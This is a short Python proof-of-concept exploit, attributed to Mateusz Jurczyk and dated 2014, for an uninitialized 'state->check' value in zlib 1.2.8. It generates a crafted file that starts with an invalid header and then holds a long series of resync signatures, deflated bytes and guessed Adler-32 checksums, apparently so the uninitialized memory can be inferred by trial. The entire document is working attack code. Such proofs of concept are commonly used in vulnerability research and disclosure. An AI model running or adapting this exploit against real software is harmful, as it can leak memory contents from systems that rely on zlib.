#
# Zlib 1.2.8 "state->check" use of uninitialized memory exploit
# Author: Mateusz Jurczyk (j00ru.vx@gmail.com)
# Date:   1/17/2014
#
import os
import random
import struct
import sys
import zlib

INVALID_HEADER   = "\xff\xff"
RESYNC_SIGNATURE = "\x00\x00\xff\xff"

def adler32_form_hash(A, B, seed, n):
  return struct.unpack('<I', struct.pack('<H', (A + (seed & 0xffff)) % 65521) +\
                             struct.pack('<H', (B + ((seed & 0xffff) * n) + ((seed >> 16) & 0xffff)) % 65521))[0]

def main(argv):
  if len(argv) != 3:
    sys.stderr.write("Usage: %s <output file> <bits>\n" % argv[0])
    sys.exit(1)

  try:
    f = open(argv[1], "w+b")
  except:
    sys.stderr.write("Unable to open output \"%s\" file.\n" % argv[1])
    sys.exit(1)

  # Create an invalid signature to trigger the bug (leave "check" uninitialized).
  f.write(INVALID_HEADER)

  # Initialize compression table for fast lookup.
  compressed = {}
  for i in range(0, 256):
    compressed[i] = zlib.compress(struct.pack('B', i))[2:-4]

  # Initialize ADLER-32 state.
  A = B = h = 0

  # Create ADLER-32 guess entries of the following format:
  # [resync signature] [random deflated byte] [adler-32 checksum guess]
  bits = int(argv[2])
  for i in range(0, 2 ** (bits) + 1):

    # Update ADLER-32 state.
    byte = random.randint(0, 255)
    A += byte
    B += A
    h = adler32_form_hash(A, B, i, i + 1)

    # Write one guess at a time.
    f.write(RESYNC_SIGNATURE + compressed[byte] + struct.pack('>I', h))

  f.close()

if __name__ == "__main__":
  main(sys.argv)

